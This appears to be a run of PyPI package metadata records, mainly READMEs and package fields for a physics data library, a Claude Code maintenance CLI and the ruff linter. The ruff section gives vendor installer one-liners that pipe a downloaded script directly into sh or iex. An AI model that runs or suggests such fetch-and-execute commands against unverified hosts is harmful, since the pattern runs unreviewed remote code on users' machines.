[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![Docs](https://img.shields.io/badge/info-documentation-informational)](https://umami-hep.github.io/atlas-ftag-tools/main) [![PyPI version](https://badge.fury.io/py/atlas-ftag-tools.svg)](https://badge.fury.io/py/atlas-ftag-tools) [![codecov](https://codecov.io/gh/umami-hep/atlas-ftag-tools/branch/main/graph/badge.svg?token=MBHLIYYQ7I)](https://codecov.io/gh/umami-hep/atlas-ftag-tools) # ATLAS FTAG Python Tools This is a collection of Python tools for working with files produced with the FTAG [ntuple dumper](https://gitlab.cern.ch/atlas-flavor-tagging-tools/training-dataset-dumper/). The code is intended to be used a [library](https://iscinumpy.dev/post/app-vs-library/) for other projects. Please see the [example notebook](ftag/example.ipynb) for usage. # Quickstart ## Installation If you want to use this package without modification, you can install from [pypi](https://pypi.org/project/atlas-ftag-tools/) using `pip`. ```bash pip install atlas-ftag-tools ``` To additionally install the development dependencies (for formatting and linting) use ```bash pip install atlas-ftag-tools[dev] ``` ## Usage Extensive examples are given in the [Examples](https://umami-hep.github.io/atlas-ftag-tools/main/examples/index.html)
text/markdown
Sam Van Stroud, Philipp Gadow, Alexander Froch
null
null
null
MIT
null
[]
[]
null
null
<3.12,>=3.10
[]
[]
[]
[ "h5py>=3.14.0", "numpy>=2.2.6", "PyYAML>=6.0.2", "scipy>=1.15.3", "ipykernel>=6.30.1; extra == \"dev\"", "mypy>=1.18.1; extra == \"dev\"", "pre-commit>=4.3.0; extra == \"dev\"", "pydoclint>=0.7.3; extra == \"dev\"", "pytest_notebook>=0.10.0; extra == \"dev\"", "pytest-cov>=7.0.0; extra == \"dev\""...
[]
[]
[]
[ "Homepage, https://github.com/umami-hep/atlas-ftag-tools/", "Issue Tracker, https://github.com/umami-hep/atlas-ftag-tools/issues" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:33:48.840975
atlas_ftag_tools-0.3.1.tar.gz
51,801
5a/75/738c7133a4e17486a490cee9cbaa17a94e749852a0f8c254d689c02113e1/atlas_ftag_tools-0.3.1.tar.gz
source
sdist
null
false
264d431f5c8fffc1d45c4d01be0c6d42
4df4892da0330c250ba7945c68f2f8b641ac2154ef109445cc2df0b0f6d754ab
5a75738c7133a4e17486a490cee9cbaa17a94e749852a0f8c254d689c02113e1
null
[ "LICENSE" ]
294
2.4
claude-maintain
0.1.0
Environment maintenance tool for Claude Code (~/.claude/)
# claude-maintain Environment maintenance tool for [Claude Code](https://claude.com/claude-code) (`~/.claude/`). Diagnoses MCP server health, finds sync debris, analyzes tool usage from session logs, and produces a health score with prioritized recommendations. ## Install ```bash # With uv (recommended) uv tool install claude-maintain # With pip pip install claude-maintain # Development (editable) git clone https://github.com/HermeticOrmus/claude-maintain.git cd claude-maintain uv tool install -e . ``` ## Commands ### `maintain health` -- MCP Server Health Check Parses both Claude Code CLI (`~/.claude/mcp.json`) and Claude Desktop (`claude_desktop_config.json`) configs. Detects: - Placeholder API keys (`YOUR_OPENAI_API_KEY_HERE`) - Cross-platform path issues (Linux paths on Windows, synced via Syncthing/rsync) - Duplicate services (e.g., 4 Telegram variants) - Missing required environment variables ```bash maintain health # Show health report maintain health --generate-clean # Save fixed configs to ~/.claude/reports/ ``` ### `maintain clean` -- Environment Cleanup Finds accumulated debris in `~/.claude/`: - Syncthing conflict files (`*.sync-conflict-*`) - Orphaned files (`.backup`, `.broken`, `.old`) - Stale session logs (configurable age threshold) - Skill naming inconsistencies (`SKILL.md` vs `skill.md`) - Directory size breakdown ```bash maintain clean # Dry run (shows what would be cleaned) maintain clean --execute # Move debris to ~/.claude/backups/ (safe, reversible) maintain clean --max-age 60 # Flag sessions older than 60 days ``` ### `maintain stats` -- Usage Analytics Stream-parses session JSONL files to extract tool usage patterns: - Per-tool invocation counts (Read, Bash, Write, MCP tools, etc.) - Skill usage tracking (which `/skills` are actually used) - Cross-reference with filesystem (find never-invoked skills) - Results cached for fast repeat runs ```bash maintain stats # Full scan (all sessions, cached) maintain stats --recent 20 # Only 20 most recent sessions maintain stats --no-cache # Force fresh parse ``` ### `maintain optimize` -- Health Score + Recommendations Runs all three modules and synthesizes a weighted health score (0-100): | Category | Weight | |----------|--------| | MCP Health | 25 | | Storage | 20 | | Skills | 20 | | Plugins | 15 | | Sync Cleanliness | 10 | | Naming Consistency | 10 | Produces prioritized recommendations (CRITICAL / HIGH / MEDIUM / LOW) and saves a markdown report to `~/.claude/reports/`. ```bash maintain optimize # Full analysis + score ``` ## JSON Output All commands support `--json` for machine-readable output: ```bash maintain --json health # JSON health report maintain --json stats # JSON usage data maintain --json optimize # JSON score + recommendations ``` ## Safety - **Dry run by default** -- `maintain clean` shows what it would do without acting - **Backups before deletion** -- `--execute` moves files to `~/.claude/backups/maintain-{timestamp}/` - **Never overwrites configs** -- `--generate-clean` writes fixed versions to `~/.claude/reports/` - **Never logs secrets** -- API tokens are flagged as a security concern but never displayed in reports ## Who is this for? Anyone who: - Uses Claude Code across multiple machines (Syncthing, rsync, cloud sync) - Has accumulated MCP servers they've experimented with - Wants to know which of their 100+ skills are actually used - Has never cleaned `~/.claude/` and suspects it's grown large ## Requirements - Python 3.10+ - Claude Code installed (`~/.claude/` directory exists) ## License MIT
text/markdown
null
Ormus <ormus@ormus.solutions>
null
null
null
claude, claude-code, cli, maintenance, mcp
[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", ...
[]
null
null
>=3.10
[]
[]
[]
[ "click>=8.1", "rich>=13.0" ]
[]
[]
[]
[ "Homepage, https://github.com/HermeticOrmus/claude-maintain", "Repository, https://github.com/HermeticOrmus/claude-maintain", "Issues, https://github.com/HermeticOrmus/claude-maintain/issues" ]
uv/0.9.8
2026-02-19T22:33:45.692913
claude_maintain-0.1.0.tar.gz
17,080
44/2c/eda04acacaaa7ef74b39e93ab01a6806f94b2b898c7c9de1d8b977107edf/claude_maintain-0.1.0.tar.gz
source
sdist
null
false
e5c71600c8cef7a7d4b9e1575f3d9f35
c17428d5af65f774186d6966ca45f5abbb5c65bcb4c7b87d8f23a31548313b6f
442ceda04acacaaa7ef74b39e93ab01a6806f94b2b898c7c9de1d8b977107edf
MIT
[ "LICENSE" ]
235
2.4
ruff
0.15.2
An extremely fast Python linter and code formatter, written in Rust.
<!-- Begin section: Overview --> # Ruff [![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff) [![image](https://img.shields.io/pypi/v/ruff.svg)](https://pypi.python.org/pypi/ruff) [![image](https://img.shields.io/pypi/l/ruff.svg)](https://github.com/astral-sh/ruff/blob/main/LICENSE) [![image](https://img.shields.io/pypi/pyversions/ruff.svg)](https://pypi.python.org/pypi/ruff) [![Actions status](https://github.com/astral-sh/ruff/workflows/CI/badge.svg)](https://github.com/astral-sh/ruff/actions) [![Discord](https://img.shields.io/badge/Discord-%235865F2.svg?logo=discord&logoColor=white)](https://discord.com/invite/astral-sh) [**Docs**](https://docs.astral.sh/ruff/) | [**Playground**](https://play.ruff.rs/) An extremely fast Python linter and code formatter, written in Rust. <p align="center"> <img alt="Shows a bar chart with benchmark results." src="https://user-images.githubusercontent.com/1309177/232603516-4fb4892d-585c-4b20-b810-3db9161831e4.svg"> </p> <p align="center"> <i>Linting the CPython codebase from scratch.</i> </p> - ⚡️ 10-100x faster than existing linters (like Flake8) and formatters (like Black) - 🐍 Installable via `pip` - 🛠️ `pyproject.toml` support - 🤝 Python 3.14 compatibility - ⚖️ Drop-in parity with [Flake8](https://docs.astral.sh/ruff/faq/#how-does-ruffs-linter-compare-to-flake8), isort, and [Black](https://docs.astral.sh/ruff/faq/#how-does-ruffs-formatter-compare-to-black) - 📦 Built-in caching, to avoid re-analyzing unchanged files - 🔧 Fix support, for automatic error correction (e.g., automatically remove unused imports) - 📏 Over [800 built-in rules](https://docs.astral.sh/ruff/rules/), with native re-implementations of popular Flake8 plugins, like flake8-bugbear - ⌨️ First-party [editor integrations](https://docs.astral.sh/ruff/editors) for [VS Code](https://github.com/astral-sh/ruff-vscode) and [more](https://docs.astral.sh/ruff/editors/setup) - 🌎 Monorepo-friendly, with [hierarchical and cascading configuration](https://docs.astral.sh/ruff/configuration/#config-file-discovery) Ruff aims to be orders of magnitude faster than alternative tools while integrating more functionality behind a single, common interface. Ruff can be used to replace [Flake8](https://pypi.org/project/flake8/) (plus dozens of plugins), [Black](https://github.com/psf/black), [isort](https://pypi.org/project/isort/), [pydocstyle](https://pypi.org/project/pydocstyle/), [pyupgrade](https://pypi.org/project/pyupgrade/), [autoflake](https://pypi.org/project/autoflake/), and more, all while executing tens or hundreds of times faster than any individual tool. Ruff is extremely actively developed and used in major open-source projects like: - [Apache Airflow](https://github.com/apache/airflow) - [Apache Superset](https://github.com/apache/superset) - [FastAPI](https://github.com/tiangolo/fastapi) - [Hugging Face](https://github.com/huggingface/transformers) - [Pandas](https://github.com/pandas-dev/pandas) - [SciPy](https://github.com/scipy/scipy) ...and [many more](#whos-using-ruff). Ruff is backed by [Astral](https://astral.sh), the creators of [uv](https://github.com/astral-sh/uv) and [ty](https://github.com/astral-sh/ty). Read the [launch post](https://astral.sh/blog/announcing-astral-the-company-behind-ruff), or the original [project announcement](https://notes.crmarsh.com/python-tooling-could-be-much-much-faster). ## Testimonials [**Sebastián Ramírez**](https://twitter.com/tiangolo/status/1591912354882764802), creator of [FastAPI](https://github.com/tiangolo/fastapi): > Ruff is so fast that sometimes I add an intentional bug in the code just to confirm it's actually > running and checking the code. [**Nick Schrock**](https://twitter.com/schrockn/status/1612615862904827904), founder of [Elementl](https://www.elementl.com/), co-creator of [GraphQL](https://graphql.org/): > Why is Ruff a gamechanger? Primarily because it is nearly 1000x faster. Literally. Not a typo. On > our largest module (dagster itself, 250k LOC) pylint takes about 2.5 minutes, parallelized across 4 > cores on my M1. Running ruff against our _entire_ codebase takes .4 seconds. [**Bryan Van de Ven**](https://github.com/bokeh/bokeh/pull/12605), co-creator of [Bokeh](https://github.com/bokeh/bokeh/), original author of [Conda](https://docs.conda.io/en/latest/): > Ruff is ~150-200x faster than flake8 on my machine, scanning the whole repo takes ~0.2s instead of > ~20s. This is an enormous quality of life improvement for local dev. It's fast enough that I added > it as an actual commit hook, which is terrific. [**Timothy Crosley**](https://twitter.com/timothycrosley/status/1606420868514877440), creator of [isort](https://github.com/PyCQA/isort): > Just switched my first project to Ruff. Only one downside so far: it's so fast I couldn't believe > it was working till I intentionally introduced some errors. [**Tim Abbott**](https://github.com/zulip/zulip/pull/23431#issuecomment-1302557034), lead developer of [Zulip](https://github.com/zulip/zulip) (also [here](https://github.com/astral-sh/ruff/issues/465#issuecomment-1317400028)): > This is just ridiculously fast... `ruff` is amazing. <!-- End section: Overview --> ## Table of Contents For more, see the [documentation](https://docs.astral.sh/ruff/). 1. [Getting Started](#getting-started) 1. [Configuration](#configuration) 1. [Rules](#rules) 1. [Contributing](#contributing) 1. [Support](#support) 1. [Acknowledgements](#acknowledgements) 1. [Who's Using Ruff?](#whos-using-ruff) 1. [License](#license) ## Getting Started<a id="getting-started"></a> For more, see the [documentation](https://docs.astral.sh/ruff/). ### Installation Ruff is available as [`ruff`](https://pypi.org/project/ruff/) on PyPI. Invoke Ruff directly with [`uvx`](https://docs.astral.sh/uv/): ```shell uvx ruff check # Lint all files in the current directory. uvx ruff format # Format all files in the current directory. ``` Or install Ruff with `uv` (recommended), `pip`, or `pipx`: ```shell # With uv. uv tool install ruff@latest # Install Ruff globally. uv add --dev ruff # Or add Ruff to your project. # With pip. pip install ruff # With pipx. pipx install ruff ``` Starting with version `0.5.0`, Ruff can be installed with our standalone installers: ```shell # On macOS and Linux. curl -LsSf https://astral.sh/ruff/install.sh | sh # On Windows. powershell -c "irm https://astral.sh/ruff/install.ps1 | iex" # For a specific version. curl -LsSf https://astral.sh/ruff/0.15.2/install.sh | sh powershell -c "irm https://astral.sh/ruff/0.15.2/install.ps1 | iex" ``` You can also install Ruff via [Homebrew](https://formulae.brew.sh/formula/ruff), [Conda](https://anaconda.org/conda-forge/ruff), and with [a variety of other package managers](https://docs.astral.sh/ruff/installation/). ### Usage To run Ruff as a linter, try any of the following: ```shell ruff check # Lint all files in the current directory (and any subdirectories). ruff check path/to/code/ # Lint all files in `/path/to/code` (and any subdirectories). ruff check path/to/code/*.py # Lint all `.py` files in `/path/to/code`. ruff check path/to/code/to/file.py # Lint `file.py`. ruff check @arguments.txt # Lint using an input file, treating its contents as newline-delimited command-line arguments. ``` Or, to run Ruff as a formatter: ```shell ruff format # Format all files in the current directory (and any subdirectories). ruff format path/to/code/ # Format all files in `/path/to/code` (and any subdirectories). ruff format path/to/code/*.py # Format all `.py` files in `/path/to/code`. ruff format path/to/code/to/file.py # Format `file.py`. ruff format @arguments.txt # Format using an input file, treating its contents as newline-delimited command-line arguments. ``` Ruff can also be used as a [pre-commit](https://pre-commit.com/) hook via [`ruff-pre-commit`](https://github.com/astral-sh/ruff-pre-commit): ```yaml - repo: https://github.com/astral-sh/ruff-pre-commit # Ruff version. rev: v0.15.2 hooks: # Run the linter. - id: ruff-check args: [ --fix ] # Run the formatter. - id: ruff-format ``` Ruff can also be used as a [VS Code extension](https://github.com/astral-sh/ruff-vscode) or with [various other editors](https://docs.astral.sh/ruff/editors/setup). Ruff can also be used as a [GitHub Action](https://github.com/features/actions) via [`ruff-action`](https://github.com/astral-sh/ruff-action): ```yaml name: Ruff on: [ push, pull_request ] jobs: ruff: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: astral-sh/ruff-action@v3 ``` ### Configuration<a id="configuration"></a> Ruff can be configured through a `pyproject.toml`, `ruff.toml`, or `.ruff.toml` file (see: [_Configuration_](https://docs.astral.sh/ruff/configuration/), or [_Settings_](https://docs.astral.sh/ruff/settings/) for a complete list of all configuration options). If left unspecified, Ruff's default configuration is equivalent to the following `ruff.toml` file: ```toml # Exclude a variety of commonly ignored directories. exclude = [ ".bzr", ".direnv", ".eggs", ".git", ".git-rewrite", ".hg", ".ipynb_checkpoints", ".mypy_cache", ".nox", ".pants.d", ".pyenv", ".pytest_cache", ".pytype", ".ruff_cache", ".svn", ".tox", ".venv", ".vscode", "__pypackages__", "_build", "buck-out", "build", "dist", "node_modules", "site-packages", "venv", ] # Same as Black. line-length = 88 indent-width = 4 # Assume Python 3.9 target-version = "py39" [lint] # Enable Pyflakes (`F`) and a subset of the pycodestyle (`E`) codes by default. select = ["E4", "E7", "E9", "F"] ignore = [] # Allow fix for all enabled rules (when `--fix`) is provided. fixable = ["ALL"] unfixable = [] # Allow unused variables when underscore-prefixed. dummy-variable-rgx = "^(_+|(_+[a-zA-Z0-9_]*[a-zA-Z0-9]+?))$" [format] # Like Black, use double quotes for strings. quote-style = "double" # Like Black, indent with spaces, rather than tabs. indent-style = "space" # Like Black, respect magic trailing commas. skip-magic-trailing-comma = false # Like Black, automatically detect the appropriate line ending. line-ending = "auto" ``` Note that, in a `pyproject.toml`, each section header should be prefixed with `tool.ruff`. For example, `[lint]` should be replaced with `[tool.ruff.lint]`. Some configuration options can be provided via dedicated command-line arguments, such as those related to rule enablement and disablement, file discovery, and logging level: ```shell ruff check --select F401 --select F403 --quiet ``` The remaining configuration options can be provided through a catch-all `--config` argument: ```shell ruff check --config "lint.per-file-ignores = {'some_file.py' = ['F841']}" ``` To opt in to the latest lint rules, formatter style changes, interface updates, and more, enable [preview mode](https://docs.astral.sh/ruff/preview/) by setting `preview = true` in your configuration file or passing `--preview` on the command line. Preview mode enables a collection of unstable features that may change prior to stabilization. See `ruff help` for more on Ruff's top-level commands, or `ruff help check` and `ruff help format` for more on the linting and formatting commands, respectively. ## Rules<a id="rules"></a> <!-- Begin section: Rules --> **Ruff supports over 900 lint rules**, many of which are inspired by popular tools like Flake8, isort, pyupgrade, and others. Regardless of the rule's origin, Ruff re-implements every rule in Rust as a first-party feature. By default, Ruff enables Flake8's `F` rules, along with a subset of the `E` rules, omitting any stylistic rules that overlap with the use of a formatter, like `ruff format` or [Black](https://github.com/psf/black). If you're just getting started with Ruff, **the default rule set is a great place to start**: it catches a wide variety of common errors (like unused imports) with zero configuration. In [preview](https://docs.astral.sh/ruff/preview/), Ruff enables an expanded set of default rules that includes rules from the `B`, `UP`, and `RUF` categories, as well as many more. If you give the new defaults a try, feel free to leave feedback in the [GitHub discussion](https://github.com/astral-sh/ruff/discussions/23203), where you can also find the new rule set listed in full. <!-- End section: Rules --> Beyond the defaults, Ruff re-implements some of the most popular Flake8 plugins and related code quality tools, including: - [autoflake](https://pypi.org/project/autoflake/) - [eradicate](https://pypi.org/project/eradicate/) - [flake8-2020](https://pypi.org/project/flake8-2020/) - [flake8-annotations](https://pypi.org/project/flake8-annotations/) - [flake8-async](https://pypi.org/project/flake8-async) - [flake8-bandit](https://pypi.org/project/flake8-bandit/) ([#1646](https://github.com/astral-sh/ruff/issues/1646)) - [flake8-blind-except](https://pypi.org/project/flake8-blind-except/) - [flake8-boolean-trap](https://pypi.org/project/flake8-boolean-trap/) - [flake8-bugbear](https://pypi.org/project/flake8-bugbear/) - [flake8-builtins](https://pypi.org/project/flake8-builtins/) - [flake8-commas](https://pypi.org/project/flake8-commas/) - [flake8-comprehensions](https://pypi.org/project/flake8-comprehensions/) - [flake8-copyright](https://pypi.org/project/flake8-copyright/) - [flake8-datetimez](https://pypi.org/project/flake8-datetimez/) - [flake8-debugger](https://pypi.org/project/flake8-debugger/) - [flake8-django](https://pypi.org/project/flake8-django/) - [flake8-docstrings](https://pypi.org/project/flake8-docstrings/) - [flake8-eradicate](https://pypi.org/project/flake8-eradicate/) - [flake8-errmsg](https://pypi.org/project/flake8-errmsg/) - [flake8-executable](https://pypi.org/project/flake8-executable/) - [flake8-future-annotations](https://pypi.org/project/flake8-future-annotations/) - [flake8-gettext](https://pypi.org/project/flake8-gettext/) - [flake8-implicit-str-concat](https://pypi.org/project/flake8-implicit-str-concat/) - [flake8-import-conventions](https://github.com/joaopalmeiro/flake8-import-conventions) - [flake8-logging](https://pypi.org/project/flake8-logging/) - [flake8-logging-format](https://pypi.org/project/flake8-logging-format/) - [flake8-no-pep420](https://pypi.org/project/flake8-no-pep420) - [flake8-pie](https://pypi.org/project/flake8-pie/) - [flake8-print](https://pypi.org/project/flake8-print/) - [flake8-pyi](https://pypi.org/project/flake8-pyi/) - [flake8-pytest-style](https://pypi.org/project/flake8-pytest-style/) - [flake8-quotes](https://pypi.org/project/flake8-quotes/) - [flake8-raise](https://pypi.org/project/flake8-raise/) - [flake8-return](https://pypi.org/project/flake8-return/) - [flake8-self](https://pypi.org/project/flake8-self/) - [flake8-simplify](https://pypi.org/project/flake8-simplify/) - [flake8-slots](https://pypi.org/project/flake8-slots/) - [flake8-super](https://pypi.org/project/flake8-super/) - [flake8-tidy-imports](https://pypi.org/project/flake8-tidy-imports/) - [flake8-todos](https://pypi.org/project/flake8-todos/) - [flake8-type-checking](https://pypi.org/project/flake8-type-checking/) - [flake8-use-pathlib](https://pypi.org/project/flake8-use-pathlib/) - [flynt](https://pypi.org/project/flynt/) ([#2102](https://github.com/astral-sh/ruff/issues/2102)) - [isort](https://pypi.org/project/isort/) - [mccabe](https://pypi.org/project/mccabe/) - [pandas-vet](https://pypi.org/project/pandas-vet/) - [pep8-naming](https://pypi.org/project/pep8-naming/) - [pydocstyle](https://pypi.org/project/pydocstyle/) - [pygrep-hooks](https://github.com/pre-commit/pygrep-hooks) - [pylint-airflow](https://pypi.org/project/pylint-airflow/) - [pyupgrade](https://pypi.org/project/pyupgrade/) - [tryceratops](https://pypi.org/project/tryceratops/) - [yesqa](https://pypi.org/project/yesqa/) For a complete enumeration of the supported rules, see [_Rules_](https://docs.astral.sh/ruff/rules/). ## Contributing<a id="contributing"></a> Contributions are welcome and highly appreciated. To get started, check out the [**contributing guidelines**](https://docs.astral.sh/ruff/contributing/). You can also join us on [**Discord**](https://discord.com/invite/astral-sh). ## Support<a id="support"></a> Having trouble? Check out the existing issues on [**GitHub**](https://github.com/astral-sh/ruff/issues), or feel free to [**open a new one**](https://github.com/astral-sh/ruff/issues/new). You can also ask for help on [**Discord**](https://discord.com/invite/astral-sh). ## Acknowledgements<a id="acknowledgements"></a> Ruff's linter draws on both the APIs and implementation details of many other tools in the Python ecosystem, especially [Flake8](https://github.com/PyCQA/flake8), [Pyflakes](https://github.com/PyCQA/pyflakes), [pycodestyle](https://github.com/PyCQA/pycodestyle), [pydocstyle](https://github.com/PyCQA/pydocstyle), [pyupgrade](https://github.com/asottile/pyupgrade), and [isort](https://github.com/PyCQA/isort). In some cases, Ruff includes a "direct" Rust port of the corresponding tool. We're grateful to the maintainers of these tools for their work, and for all the value they've provided to the Python community. Ruff's formatter is built on a fork of Rome's [`rome_formatter`](https://github.com/rome/tools/tree/main/crates/rome_formatter), and again draws on both API and implementation details from [Rome](https://github.com/rome/tools), [Prettier](https://github.com/prettier/prettier), and [Black](https://github.com/psf/black). Ruff's import resolver is based on the import resolution algorithm from [Pyright](https://github.com/microsoft/pyright). Ruff is also influenced by a number of tools outside the Python ecosystem, like [Clippy](https://github.com/rust-lang/rust-clippy) and [ESLint](https://github.com/eslint/eslint). Ruff is the beneficiary of a large number of [contributors](https://github.com/astral-sh/ruff/graphs/contributors). Ruff is released under the MIT license. ## Who's Using Ruff?<a id="whos-using-ruff"></a> Ruff is used by a number of major open-source projects and companies, including: - [Albumentations](https://github.com/albumentations-team/AlbumentationsX) - Amazon ([AWS SAM](https://github.com/aws/serverless-application-model)) - [Anki](https://apps.ankiweb.net/) - Anthropic ([Python SDK](https://github.com/anthropics/anthropic-sdk-python)) - [Apache Airflow](https://github.com/apache/airflow) - AstraZeneca ([Magnus](https://github.com/AstraZeneca/magnus-core)) - [Babel](https://github.com/python-babel/babel) - Benchling ([Refac](https://github.com/benchling/refac)) - [Bokeh](https://github.com/bokeh/bokeh) - Capital One ([datacompy](https://github.com/capitalone/datacompy)) - CrowdCent ([NumerBlox](https://github.com/crowdcent/numerblox)) <!-- typos: ignore --> - [Cryptography (PyCA)](https://github.com/pyca/cryptography) - CERN ([Indico](https://getindico.io/)) - [DVC](https://github.com/iterative/dvc) - [Dagger](https://github.com/dagger/dagger) - [Dagster](https://github.com/dagster-io/dagster) - Databricks ([MLflow](https://github.com/mlflow/mlflow)) - [Dify](https://github.com/langgenius/dify) - [FastAPI](https://github.com/tiangolo/fastapi) - [Godot](https://github.com/godotengine/godot) - [Gradio](https://github.com/gradio-app/gradio) - [Great Expectations](https://github.com/great-expectations/great_expectations) - [HTTPX](https://github.com/encode/httpx) - [Hatch](https://github.com/pypa/hatch) - [Home Assistant](https://github.com/home-assistant/core) - Hugging Face ([Transformers](https://github.com/huggingface/transformers), [Datasets](https://github.com/huggingface/datasets), [Diffusers](https://github.com/huggingface/diffusers)) - IBM ([Qiskit](https://github.com/Qiskit/qiskit)) - ING Bank ([popmon](https://github.com/ing-bank/popmon), [probatus](https://github.com/ing-bank/probatus)) - [Ibis](https://github.com/ibis-project/ibis) - [ivy](https://github.com/unifyai/ivy) - [JAX](https://github.com/jax-ml/jax) - [Jupyter](https://github.com/jupyter-server/jupyter_server) - [Kraken Tech](https://kraken.tech/) - [LangChain](https://github.com/hwchase17/langchain) - [Litestar](https://litestar.dev/) - [LlamaIndex](https://github.com/jerryjliu/llama_index) - Matrix ([Synapse](https://github.com/matrix-org/synapse)) - [MegaLinter](https://github.com/oxsecurity/megalinter) - Meltano ([Meltano CLI](https://github.com/meltano/meltano), [Singer SDK](https://github.com/meltano/sdk)) - Microsoft ([Semantic Kernel](https://github.com/microsoft/semantic-kernel), [ONNX Runtime](https://github.com/microsoft/onnxruntime), [LightGBM](https://github.com/microsoft/LightGBM)) - Modern Treasury ([Python SDK](https://github.com/Modern-Treasury/modern-treasury-python)) - Mozilla ([Firefox](https://github.com/mozilla/gecko-dev)) - [Mypy](https://github.com/python/mypy) - [Nautobot](https://github.com/nautobot/nautobot) - Netflix ([Dispatch](https://github.com/Netflix/dispatch)) - [Neon](https://github.com/neondatabase/neon) - [Nokia](https://nokia.com/) - [NoneBot](https://github.com/nonebot/nonebot2) - [NumPyro](https://github.com/pyro-ppl/numpyro) - [ONNX](https://github.com/onnx/onnx) - [OpenBB](https://github.com/OpenBB-finance/OpenBBTerminal) - [Open Wine Components](https://github.com/Open-Wine-Components/umu-launcher) - [PDM](https://github.com/pdm-project/pdm) - [PaddlePaddle](https://github.com/PaddlePaddle/Paddle) - [Pandas](https://github.com/pandas-dev/pandas) - [Pillow](https://github.com/python-pillow/Pillow) - [Poetry](https://github.com/python-poetry/poetry) - [Polars](https://github.com/pola-rs/polars) - [PostHog](https://github.com/PostHog/posthog) - Prefect ([Python SDK](https://github.com/PrefectHQ/prefect), [Marvin](https://github.com/PrefectHQ/marvin)) - [PyInstaller](https://github.com/pyinstaller/pyinstaller) - [PyMC](https://github.com/pymc-devs/pymc/) - [PyMC-Marketing](https://github.com/pymc-labs/pymc-marketing) - [pytest](https://github.com/pytest-dev/pytest) - [PyTorch](https://github.com/pytorch/pytorch) - [Pydantic](https://github.com/pydantic/pydantic) - [Pylint](https://github.com/PyCQA/pylint) - [PyScripter](https://github.com/pyscripter/pyscripter) - [PyVista](https://github.com/pyvista/pyvista) - [Reflex](https://github.com/reflex-dev/reflex) - [River](https://github.com/online-ml/river) - [Rippling](https://rippling.com) - [Robyn](https://github.com/sansyrox/robyn) - [Saleor](https://github.com/saleor/saleor) - Scale AI ([Launch SDK](https://github.com/scaleapi/launch-python-client)) - [SciPy](https://github.com/scipy/scipy) - Snowflake ([SnowCLI](https://github.com/Snowflake-Labs/snowcli)) - [Sphinx](https://github.com/sphinx-doc/sphinx) - [Stable Baselines3](https://github.com/DLR-RM/stable-baselines3) - [Starlette](https://github.com/encode/starlette) - [Streamlit](https://github.com/streamlit/streamlit) - [The Algorithms](https://github.com/TheAlgorithms/Python) - [Vega-Altair](https://github.com/altair-viz/altair) - [Weblate](https://weblate.org/) - WordPress ([Openverse](https://github.com/WordPress/openverse)) - [ZenML](https://github.com/zenml-io/zenml) - [Zulip](https://github.com/zulip/zulip) - [build (PyPA)](https://github.com/pypa/build) - [cibuildwheel (PyPA)](https://github.com/pypa/cibuildwheel) - [delta-rs](https://github.com/delta-io/delta-rs) - [featuretools](https://github.com/alteryx/featuretools) - [meson-python](https://github.com/mesonbuild/meson-python) - [nox](https://github.com/wntrblm/nox) - [pip](https://github.com/pypa/pip) ### Show Your Support If you're using Ruff, consider adding the Ruff badge to your project's `README.md`: ```md [![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff) ``` ...or `README.rst`: ```rst .. image:: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json :target: https://github.com/astral-sh/ruff :alt: Ruff ``` ...or, as HTML: ```html <a href="https://github.com/astral-sh/ruff"><img src="https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json" alt="Ruff" style="max-width:100%;"></a> ``` ## License<a id="license"></a> This repository is licensed under the [MIT License](https://github.com/astral-sh/ruff/blob/main/LICENSE) <div align="center"> <a target="_blank" href="https://astral.sh" style="background:none"> <img src="https://raw.githubusercontent.com/astral-sh/ruff/main/assets/svg/Astral.svg" alt="Made by Astral"> </a> </div>
text/markdown; charset=UTF-8; variant=GFM
null
"Astral Software Inc." <hey@astral.sh>
null
null
null
automation, flake8, pycodestyle, pyflakes, pylint, clippy
[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8"...
[]
https://docs.astral.sh/ruff
null
>=3.7
[]
[]
[]
[]
[]
[]
[]
[ "Changelog, https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md", "Documentation, https://docs.astral.sh/ruff/", "Repository, https://github.com/astral-sh/ruff" ]
uv/0.10.2 {"installer":{"name":"uv","version":"0.10.2","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true}
2026-02-19T22:32:44.234021
ruff-0.15.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
11,149,151
d7/02/849b46184bcfdd4b64cde61752cc9a146c54759ed036edd11857e9b8443b/ruff-0.15.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
py3
bdist_wheel
null
false
c71bf99026b22623fb358ea584058265
b7a672c82b5f9887576087d97be5ce439f04bbaf548ee987b92d3a7dede41d3a
d702849b46184bcfdd4b64cde61752cc9a146c54759ed036edd11857e9b8443b
null
[ "LICENSE" ]
2,491,128
2.4
artificer-dispatcher
0.2.4
Polls project management APIs for ready tickets and spawns AI agents to work on them
